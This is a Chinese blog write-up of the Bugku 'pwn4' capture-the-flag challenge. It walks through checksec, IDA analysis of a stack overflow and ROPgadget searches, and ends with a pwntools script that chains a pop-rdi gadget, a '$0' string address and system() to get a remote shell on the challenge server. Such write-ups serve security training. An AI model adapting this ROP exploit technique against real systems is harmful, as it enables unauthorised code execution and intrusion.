Bugku pwn4 WP

最新推荐文章于 2023-08-20 16:21:31 发布
最新推荐文章于 2023-08-20 16:21:31 发布
阅读量681 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AcSuccess/article/details/104383412
版权

下载地址

url

checksec

[*] '/mnt/hgfs/ubuntu_share/pwn/wiki/pwn4'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments

IDA分析

  • 发现栈溢出
  • 64位程序,可溢出字节为0x30-0x10-8=24个字节
  • 24个字节只能填写3个地址,很难构造较长的ROP链
  • 并且64位程序函数调用时,参数优先放在寄存器中,当参数小于6个的时候,使用rdi, rsi, rdx, rcx, r8, r9六个寄存器存储参数,返回地址存放在栈中。

  • 继续分析,发现调用了system函数,但/bin/sh字符串没有查找到
root@ubuntu:/mnt/hgfs/ubuntu_share/pwn/wiki# ROPgadget --binary pwn4 --string "/bin/sh"
Strings information
============================================================
  • 在IDA中快捷键shift+f12可以掉出字符串窗口

  • 使用$0可以代替/bin/sh起一个shell
  • 具体知识可以参考我的这篇博客
  • 使用ROPgadget查找$0字符串的地址
root@ubuntu:/mnt/hgfs/ubuntu_share/pwn/wiki# ROPgadget --binary pwn4 --string "$0"
Strings information
============================================================
root@ubuntu:/mnt/hgfs/ubuntu_share/pwn/wiki# ROPgadget --binary pwn4 --string "/$0"
Strings information
============================================================
  • 我用ROPgadget没有查出$0的地址,但在IDA中存在该字符串
  • 我们可以通过IDA的字符串窗口推算它的地址
  • 0x0601100是这个字符串的地址,经过31个字符到$0
  • 0x0601100+31=0x060111f
  • 并且如果调用system函数,并将$0作为参数传给syste函数的话,$0字符串应该在rdi寄存器中。
  • 所以查找ROPgadget
root@ubuntu:/mnt/hgfs/ubuntu_share/pwn/wiki# ROPgadget --binary pwn4 --only "pop|ret"
Gadgets information
============================================================
0x00000000004007cc : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004007ce : pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004007d0 : pop r14 ; pop r15 ; ret
0x00000000004007d2 : pop r15 ; ret
0x00000000004007cb : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004007cf : pop rbp ; pop r14 ; pop r15 ; ret
0x0000000000400630 : pop rbp ; ret
0x00000000004007d3 : pop rdi ; ret
0x00000000004007d1 : pop rsi ; pop r15 ; ret
0x00000000004007cd : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400541 : ret

Unique gadgets found: 11

栈结构如下

  • 执行到ret指令时,因为ret指令相当于pop eip;所以rsp+8,rsp指向$0地址处,将pop edi的地址赋给eip,执行eip
  • 弹出$0,并将其赋给edi寄存器,rsp+8,指向system地址
  • 执行system函数

Exp编写

from pwn import *
from LibcSearcher import *

context.log_level = "DEBUG"

#sh = process('pwn4')

sh = remote("114.116.54.89", 10004)

system_addr = 0x0000000000400570

pop_addr = 0x00000000004007d3

binsh_addr = 0x000000000060111f

payload = 'a' * 24 + p64(pop_addr) + p64(binsh_addr) + p64(system_addr)

sh.recv()

sh.sendline(payload)

sh.interactive()
西杭
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BugkuCTF pwn canary
ChaoYue_miku的博客
07-03 964
** 0、下载附件使用checksec检查保护情况 ** 开启了NX保护和Canary保护 ** 1、nc 114.67.246.176 19138远程连接,查看题目 ** ** 2、使用IDA 64 Pro打开文件反编译 ** 查看main函数,两个read()函数都可以读取0x300个字节的数据,而buf和v5到栈底指针rbp的距离只有0x240和0x210字节,因此这里存在栈溢出漏洞 靠近栈底处的var_8应该就是canary 查看main函数的汇编指令 结合题意可知,覆盖canary末尾的
HGAME 2017 or 2018 PWN levels
qq_42192672的博客
11-12 900
这个算是做之前的复现吧,感谢Veritas501 WEEK1 1.flag server 拖进IDA看一下 流程倒着看,要有flag-----v8=1-----v5=v6-----s1=admin,我们可以把s1覆盖掉-----username长度不能大于63,不能等于0-----之后还要猜出随机数v6,看一下怎么覆盖 这些变量都在一起,美滋滋 exp from pwn...
bugku pwn4 学习
欢迎来到神林的博客
08-27 1143
2019-08-25 bugku pwn4 学习 1.拿到题目先file 一下文件看看文件属性 查看得知是64位动态链接库的文件。2.checksec 查看是否开启什么保护然而并没有什么保护PIE 保护指定是对代码段进行保护3.IDA查看内容 看到了敏感函数system,看着想办法跳转4.查看main函数,有栈溢出的敏感函数 read 想办法利用read 函数5.查看read函数栈中内容 完全能够...
BugKu做题记录【pwn】(持续更新中)
Assassin
04-06 3005
文章目录repeater1.题目分析2.我的错误思路3.正确思路4.利用代码5.知识点总结 好久不做题了,刚刚开始的签到题就做了三天,感觉水平确实下降得太厉害了,恢复训练~ ** ** repeater 1.题目分析 题目逻辑非常简单,就是read函数输入内容,然后printf输出,经过观察和简单得调试,我们需要注意到几个内容 pinrtf存在格式化字符串漏洞 read长度为0x64,不足以造成栈溢出 经过权限查询发现开启了NX保护,RELRO是部分开启,也就是堆栈不可执行 经过查看,bss段不可执
BugkuCTF-PWN题canary超详细讲解
am_03的博客
08-31 2072
知识点 小端序说明,数据在内存里是如何存储的?下表里数据都为16进制 解题流程 题目Hint:更新 LibcSeacher 的 libc-database checksec查看保护机制 0x28=40 0x10=16 0x29=41 0x300=768 0x2C=44 buf长度为48,而read读取长度为768 v5长度为520,而read读取长度为768 所以存在栈溢出漏洞 from pwn import * #sh = process('./pwn4_') #context.log_lev
Bugku-pwn4详解
Casuall的博客
07-14 4373
这道题来自bugku的第三道pwn题,pwn4。首先进行一些常规检查。 一个64位动态链接的程序,没有开什么保护。 然后用IDA打开,有个危险函数read,可以用来溢出。 shift + F12查看有没有可疑字符串,然后在字符串上按x查看引用他的地方,找到了一个system函数 但是system函数里面的字符串并不是我们想要的'/bin/sh',尝试用ROPgadget去搜索,命令为ROPg...
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
bugku pwn libc
09-03
bugku pwn3和pwn5用到的libc文件,原题目中没有给出libc文件,也不容易获取libc版本
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
Bugku S3 AWD排位赛-9 pwn二进制
最新发布
08-27
Bugku S3 AWD排位赛-9 pwn二进制
hal stm32g4 pwn.zip
07-23
蓝桥杯的pwn stm43g4平台
Bugku——瑞士军刀——pwn
2301_77163106的博客
08-20 232
我们可以很清楚看到有flag文件,进行抓取使用命令cat 相应文件--->cat flag,得到flag。回车并输入查找命令ls(可以了解一些其他的==>接下来我们只要访问他就行了打开kali进入终端。进入终端窗口输入 nc ip 端口。点击进入(也可以点击鼠标右键)题目给我们 nc ip 端口。
CTF中的PWN——无安全防护(栈溢出)
壊壊的诱惑你的博客
09-20 2414
前言 今天心情不错,人最大的敌人真的就是自己!!! 好久没学PWN和逆向了,今天写一篇关于CTF中PWN的文章回忆一下。本文主要讲的是利用栈溢出的基础PWN,分别有使用shellcode类型、满足函数条件类型及使用软件自带system函数类型,其中自带system函数的类型软件因为传参方式不同进而分为32bit与64bit的软件。 满足函数条件类型 很low的命名...
pwn学习总结(二) —— 基础知识(持续更新)
qq_41988448的博客
11-19 923
pwn学习总结(四) —— 基础知识(持续更新)PLT表&GOT表 PLT表&GOT表 PLT表:指向GOT表,作用是动态加载函数地址 GOT表:位于数据段,函数被调用时,成员为函数在内存中的实际地址 ...
Pwn入门笔记(五)ROP
qq_33590156的博客
11-29 594
ROP32位的ROP64位的ROP 32位的ROP 这个在栈基础中提到过,此处写出是为了和64位的形成对比。通过在返回地址上写上函数PLT的地址来实现跳转到函数,调用函数时压入参数后会压入eip(返回地址),然后32位程序参数在栈上,所以结构如下图: 栈底-高地址-> c b a 实际调用函数中的返回地址eip dddd 原返回地址(r) system的plt表地址 原ebp (s) aaaa aaaaaaaaaaaaaaa… 栈顶-低地址-> …
bugku 里面的五个pwnwp
qq_36495104的博客
05-08 2068
pwn1 没给二进制文件,直接nc过去就能拿shell,查看flag,flag{6979d853add353c9} pwn2 查看保护,发现什么保护都没开启 ida反编译查看 明显栈溢出,还注意到有后门函数 只需要劫持函数的返回地址到get_shell函数,就可以用拿到flag。使用gdb调试发现,在0x38个字符后就会覆盖返回地址,所以编写脚本拿flag。 exp #pwn2.py from pwn import * #sh=process('./pwn2') sh=remote('11
Bugku PWN Easy_int
JEWSWS的博客
04-01 300
【春风不解语,独做狮子吟。】
bugku-PWN-瑞士军刀解析过程
weixin_46168073的博客
11-14 1827
一、启动场景 点进去,我发现点不进去,搞了半天,花了10个币才搞明白这个不是点的,而是连接的。 这里使用kali。 kali vmwar免安版本: 链接:https://pan.baidu.com/s/1SvbXZlx-0h5gN5__rOp2bg 提取码:1234 二、解题过程 安装kali之后,我们直接开大,然后输入nc 114.67.246.176 13340(端口有变是因为我重启了一次,这里输入,你的端口。) 然后ls,目录下有个flag目录,直接cat flag目录...
BugkuCTF-PWNpwn7-repeater详细讲解多解法
am_03的博客
08-31 3783
知识点 解题流程 方法一 查看文件类型: 32位文件 查看保护机制 只开启了NX 32位IDA打开 伪码: 0x70=112 0x64=100 发现该题目为典型的格式字符串漏洞。 解题思路 此题的大概思路如下: 1、找到libc_start_main在栈内的偏移,使用%p暴露该地址 2、利用LibcSearcher猜测使用的libc,算出libc基址 3、计算出此libc的system地址 4、把prinf的got表改为system地址 5、执行system(’/bin/sh’) 具体调试 执行gd
stm32f4 pwn adc声音
08-06
STM32F4是一款强大的微控制器,它具备PWM(脉冲宽度调制)和ADC(模数转换器)功能,可以用来实现音频输出和声音采集。 PWM技术可以通过调整信号的占空比,来生成不同的电平模式,进而产生特定频率的方波信号。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

西杭

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值